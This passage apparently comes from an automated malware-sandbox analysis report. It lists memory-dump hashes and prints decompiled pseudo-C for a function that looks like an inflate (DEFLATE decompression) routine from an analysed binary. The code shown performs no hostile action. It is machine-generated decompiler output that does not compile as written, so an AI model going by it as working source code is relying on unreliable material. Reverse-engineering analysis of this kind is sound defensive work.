                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: FileFindFirst
                                                                                    • String ID:
                                                                                    • API String ID: 1974802433-0
                                                                                    • Opcode ID: 4423a52aeb003c350b17b55cd02f29573d1ce5b782dbbfafeefecc88e991a537
                                                                                    • Instruction ID: cbd12963852304709d998dbd60bf7e8f33587a64a337c4fd13578998f516bfb3
                                                                                    • Opcode Fuzzy Hash: 4423a52aeb003c350b17b55cd02f29573d1ce5b782dbbfafeefecc88e991a537
                                                                                    • Instruction Fuzzy Hash: 3EF0A072604110DED711EBA49A49AFEB768AF61314F60457FF112B20C1D7B889469B3A
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00406945, Relevance: .3, Instructions: 334COMMONCrypto
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 79%
                                                                                    			E00406945(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E004070B4( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x408408; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x408408; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E0040711C( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M00407074))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x40a408 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L180;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L180;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L180;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x40a408 + __eax * 2) & 0x0000ffff =  *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x40a408 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L180;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L180;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x40a408 + __eax * 2) & 0x0000ffff =  *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L183;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
													 *(__ebp - 0x30) = __eax;
													 *(__ebp - 0x20) = __ecx;
													 *(__ebp - 0x2c) = __edi;
													if(__ecx == __esi[0x26e8]) {
														__ecx =  &(__esi[0x6e8]);
														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
													}
													_t357 =  &(__esi[1]);
													 *_t357 = __esi[1] - 1;
													__eflags =  *_t357;
												} while ( *_t357 != 0);
											}
											goto L23;
										case 6:
											L156:
											__eax =  *(__ebp - 0x2c);
											__edi =  *(__ebp - 0x30);
											__eflags = __eax;
											if(__eax != 0) {
												L172:
												__cl = __esi[2];
												 *__edi = __cl;
												__edi = __edi + 1;
												__eax = __eax - 1;
												 *(__ebp - 0x30) = __edi;
												 *(__ebp - 0x2c) = __eax;
												goto L23;
											}
											L157:
											__ecx = __esi[0x26e8];
											__eflags = __edi - __ecx;
											if(__edi != __ecx) {
												L163:
												__esi[0x26ea] = __edi;
												__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
												__edi = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edi - __ecx;
												 *(__ebp - 0x30) = __edi;
												if(__edi >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edi;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edi;
													__eax = __ecx - __edi - 1;
												}
												__edx = __esi[0x26e8];
												__eflags = __edi - __edx;
												 *(__ebp - 8) = __edx;
												if(__edi == __edx) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx != __edx) {
														__edi = __edx;
														__eflags = __edi - __ecx;
														 *(__ebp - 0x30) = __edi;
														if(__edi >= __ecx) {
															__eax =  *(__ebp - 8);
															__eax =  *(__ebp - 8) - __edi;
															__eflags = __eax;
														} else {
															__ecx = __ecx - __edi;
															__eax = __ecx;
														}
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L172;
												}
											}
											L158:
											__eax = __esi[0x26e9];
											__edx =  &(__esi[0x6e8]);
											__eflags = __eax - __edx;
											if(__eax == __edx) {
												goto L163;
											}
											L159:
											__edi = __edx;
											__eflags = __edi - __eax;
											if(__edi >= __eax) {
												__ecx = __ecx - __edi;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edi;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L172;
											} else {
												goto L163;
											}
										case 7:
											L173:
											__eflags = __ebx - 7;
											if(__ebx > 7) {
												__ebx = __ebx - 8;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
												_t380 = __ebp - 0x38;
												 *_t380 =  *(__ebp - 0x38) - 1;
												__eflags =  *_t380;
											}
											goto L175;
										case 8:
											L4:
											while(_t425 < 3) {
												if( *(_t448 - 0x34) == 0) {
													goto L182;
												} else {
													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
													_t425 = _t425 + 8;
													continue;
												}
											}
											_t425 = _t425 - 3;
											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
											_t406 =  *(_t448 - 0x40) & 0x00000007;
											asm("sbb ecx, ecx");
											_t408 = _t406 >> 1;
											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
											if(_t408 == 0) {
												L24:
												 *_t446 = 9;
												_t436 = _t425 & 0x00000007;
												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
												_t425 = _t425 - _t436;
												goto L180;
											}
											L6:
											_t411 = _t408 - 1;
											if(_t411 == 0) {
												L13:
												__eflags =  *0x42e3a8;
												if( *0x42e3a8 != 0) {
													L22:
													_t412 =  *0x40a42c; // 0x9
													_t446[4] = _t412;
													_t413 =  *0x40a430; // 0x5
													_t446[4] = _t413;
													_t414 =  *0x42d224; // 0x0
													_t446[5] = _t414;
													_t415 =  *0x42d220; // 0x0
													_t446[6] = _t415;
													L23:
													 *_t446 =  *_t446 & 0x00000000;
													goto L180;
												} else {
													_t26 = _t448 - 8;
													 *_t26 =  *(_t448 - 8) & 0x00000000;
													__eflags =  *_t26;
													_t416 = 0x42d228;
													goto L15;
													L20:
													 *_t416 = _t438;
													_t416 = _t416 + 4;
													__eflags = _t416 - 0x42d6a8;
													if(_t416 < 0x42d6a8) {
														L15:
														__eflags = _t416 - 0x42d464;
														_t438 = 8;
														if(_t416 > 0x42d464) {
															__eflags = _t416 - 0x42d628;
															if(_t416 >= 0x42d628) {
																__eflags = _t416 - 0x42d688;
																if(_t416 < 0x42d688) {
																	_t438 = 7;
																}
															} else {
																_t438 = 9;
															}
														}
														goto L20;
													} else {
														E0040711C(0x42d228, 0x120, 0x101, 0x40841c, 0x40845c, 0x42d224, 0x40a42c, 0x42db28, _t448 - 8);
														_push(0x1e);
														_pop(_t440);
														_push(5);
														_pop(_t419);
														memset(0x42d228, _t419, _t440 << 2);
														_t450 = _t450 + 0xc;
														_t442 = 0x42d228 + _t440;
														E0040711C(0x42d228, 0x1e, 0, 0x40849c, 0x4084d8, 0x42d220, 0x40a430, 0x42db28, _t448 - 8);
														 *0x42e3a8 =  *0x42e3a8 + 1;
														__eflags =  *0x42e3a8;
														goto L22;
													}
												}
											}
											L7:
											_t423 = _t411 - 1;
											if(_t423 == 0) {
												 *_t446 = 0xb;
												goto L180;
											}
											L8:
											if(_t423 != 1) {
												goto L180;
											}
											goto L9;
										case 9:
											while(1) {
												L27:
												__eflags = __ebx - 0x20;
												if(__ebx >= 0x20) {
													break;
												}
												L25:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L26:
												__eax =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__ecx = __ebx;
												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L28:
											__eax =  *(__ebp - 0x40);
											__ebx = 0;
											__eax =  *(__ebp - 0x40) & 0x0000ffff;
											 *(__ebp - 0x40) = 0;
											__eflags = __eax;
											__esi[1] = __eax;
											if(__eax == 0) {
												goto L53;
											}
											L29:
											_push(0xa);
											_pop(__eax);
											goto L54;
										case 0xa:
											L30:
											__eflags =  *(__ebp - 0x34);
											if( *(__ebp - 0x34) == 0) {
												goto L182;
											}
											L31:
											__eax =  *(__ebp - 0x2c);
											__eflags = __eax;
											if(__eax != 0) {
												L48:
												__eflags = __eax -  *(__ebp - 0x34);
												if(__eax >=  *(__ebp - 0x34)) {
													__eax =  *(__ebp - 0x34);
												}
												__ecx = __esi[1];
												__eflags = __ecx - __eax;
												__edi = __ecx;
												if(__ecx >= __eax) {
													__edi = __eax;
												}
												__eax = E00405C4B( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
												_t80 =  &(__esi[1]);
												 *_t80 = __esi[1] - __edi;
												__eflags =  *_t80;
												if( *_t80 == 0) {
													L53:
													__eax = __esi[0x145];
													L54:
													 *__esi = __eax;
												}
												goto L180;
											}
											L32:
											__ecx = __esi[0x26e8];
											__edx =  *(__ebp - 0x30);
											__eflags = __edx - __ecx;
											if(__edx != __ecx) {
												L38:
												__esi[0x26ea] = __edx;
												__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
												__edx = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edx - __ecx;
												 *(__ebp - 0x30) = __edx;
												if(__edx >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edx;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edx;
													__eax = __ecx - __edx - 1;
												}
												__edi = __esi[0x26e8];
												 *(__ebp - 0x2c) = __eax;
												__eflags = __edx - __edi;
												if(__edx == __edi) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __edx - __ecx;
													if(__eflags != 0) {
														 *(__ebp - 0x30) = __edx;
														if(__eflags >= 0) {
															__edi = __edi - __edx;
															__eflags = __edi;
															__eax = __edi;
														} else {
															__ecx = __ecx - __edx;
															__eax = __ecx;
														}
														 *(__ebp - 0x2c) = __eax;
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L48;
												}
											}
											L33:
											__eax = __esi[0x26e9];
											__edi =  &(__esi[0x6e8]);
											__eflags = __eax - __edi;
											if(__eax == __edi) {
												goto L38;
											}
											L34:
											__edx = __edi;
											__eflags = __edx - __eax;
											 *(__ebp - 0x30) = __edx;
											if(__edx >= __eax) {
												__ecx = __ecx - __edx;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edx;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											 *(__ebp - 0x2c) = __eax;
											if(__eax != 0) {
												goto L48;
											} else {
												goto L38;
											}
										case 0xb:
											goto L56;
										case 0xc:
											L60:
											__esi[1] = __esi[1] >> 0xa;
											__eax = (__esi[1] >> 0xa) + 4;
											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
												goto L68;
											}
											goto L61;
										case 0xd:
											while(1) {
												L93:
												__eax = __esi[1];
												__ecx = __esi[2];
												__edx = __eax;
												__eax = __eax & 0x0000001f;
												__edx = __edx >> 5;
												__eax = __edx + __eax + 0x102;
												__eflags = __esi[2] - __eax;
												if(__esi[2] >= __eax) {
													break;
												}
												L73:
												__eax = __esi[0x143];
												while(1) {
													L76:
													__eflags = __ebx - __eax;
													if(__ebx >= __eax) {
														break;
													}
													L74:
													__eflags =  *(__ebp - 0x34);
													if( *(__ebp - 0x34) == 0) {
														goto L182;
													}
													L75:
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
													__ecx = __ebx;
													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
													__ebx = __ebx + 8;
													__eflags = __ebx;
												}
												L77:
												__eax =  *(0x40a408 + __eax * 2) & 0x0000ffff;
												__eax = __eax &  *(__ebp - 0x40);
												__ecx = __esi[0x144];
												__eax = __esi[0x144] + __eax * 4;
												__edx =  *(__eax + 1) & 0x000000ff;
												__eax =  *(__eax + 2) & 0x0000ffff;
												__eflags = __eax - 0x10;
												 *(__ebp - 0x14) = __eax;
												if(__eax >= 0x10) {
													L79:
													__eflags = __eax - 0x12;
													if(__eax != 0x12) {
														__eax = __eax + 0xfffffff2;
														 *(__ebp - 8) = 3;
													} else {
														_push(7);
														 *(__ebp - 8) = 0xb;
														_pop(__eax);
													}
													while(1) {
														L84:
														__ecx = __eax + __edx;
														__eflags = __ebx - __eax + __edx;
														if(__ebx >= __eax + __edx) {
															break;
														}
														L82:
														__eflags =  *(__ebp - 0x34);
														if( *(__ebp - 0x34) == 0) {
															goto L182;
														}
														L83:
														__ecx =  *(__ebp - 0x38);
														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
														__ecx = __ebx;
														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
														__ebx = __ebx + 8;
														__eflags = __ebx;
													}
													L85:
													__ecx = __edx;
													__ebx = __ebx - __edx;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													 *(0x40a408 + __eax * 2) & 0x0000ffff =  *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
													__edx =  *(__ebp - 8);
													__ebx = __ebx - __eax;
													__edx =  *(__ebp - 8) + ( *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
													__ecx = __eax;
													__eax = __esi[1];
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													__ecx = __esi[2];
													__eax = __eax >> 5;
													__edi = __eax >> 0x00000005 & 0x0000001f;
													__eax = __eax & 0x0000001f;
													__eax = __edi + __eax + 0x102;
													__edi = __edx + __ecx;
													__eflags = __edx + __ecx - __eax;
													if(__edx + __ecx > __eax) {
														goto L9;
													}
													L86:
													__eflags =  *(__ebp - 0x14) - 0x10;
													if( *(__ebp - 0x14) != 0x10) {
														L89:
														__edi = 0;
														__eflags = 0;
														L90:
														__eax = __esi + 0xc + __ecx * 4;
														do {
															L91:
															 *__eax = __edi;
															__ecx = __ecx + 1;
															__eax = __eax + 4;
															__edx = __edx - 1;
															__eflags = __edx;
														} while (__edx != 0);
														__esi[2] = __ecx;
														continue;
													}
													L87:
													__eflags = __ecx - 1;
													if(__ecx < 1) {
														goto L9;
													}
													L88:
													__edi =  *(__esi + 8 + __ecx * 4);
													goto L90;
												}
												L78:
												__ecx = __edx;
												__ebx = __ebx - __edx;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
												__ecx = __esi[2];
												 *(__esi + 0xc + __esi[2] * 4) = __eax;
												__esi[2] = __esi[2] + 1;
											}
											L94:
											__eax = __esi[1];
											__esi[0x144] = __esi[0x144] & 0x00000000;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
											__edi = __eax;
											__eax = __eax >> 5;
											__edi = __edi & 0x0000001f;
											__ecx = 0x101;
											__eax = __eax & 0x0000001f;
											__edi = __edi + 0x101;
											__eax = __eax + 1;
											__edx = __ebp - 0xc;
											 *(__ebp - 0x14) = __eax;
											 &(__esi[0x148]) = __ebp - 4;
											 *(__ebp - 4) = 9;
											__ebp - 0x18 =  &(__esi[3]);
											 *(__ebp - 0x10) = 6;
											__eax = E0040711C( &(__esi[3]), __edi, 0x101, 0x40841c, 0x40845c, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
											__eflags =  *(__ebp - 4);
											if( *(__ebp - 4) == 0) {
												__eax = __eax | 0xffffffff;
												__eflags = __eax;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L9;
											} else {
												L97:
												__ebp - 0xc =  &(__esi[0x148]);
												__ebp - 0x10 = __ebp - 0x1c;
												__eax = __esi + 0xc + __edi * 4;
												__eax = E0040711C(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x40849c, 0x4084d8, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
												__eflags = __eax;
												if(__eax != 0) {
													goto L9;
												}
												L98:
												__eax =  *(__ebp - 0x10);
												__eflags =  *(__ebp - 0x10);
												if( *(__ebp - 0x10) != 0) {
													L100:
													__cl =  *(__ebp - 4);
													 *__esi =  *__esi & 0x00000000;
													__eflags =  *__esi;
													__esi[4] = __al;
													__eax =  *(__ebp - 0x18);
													__esi[5] =  *(__ebp - 0x18);
													__eax =  *(__ebp - 0x1c);
													__esi[4] = __cl;
													__esi[6] =  *(__ebp - 0x1c);
													goto L101;
												}
												L99:
												__eflags = __edi - 0x101;
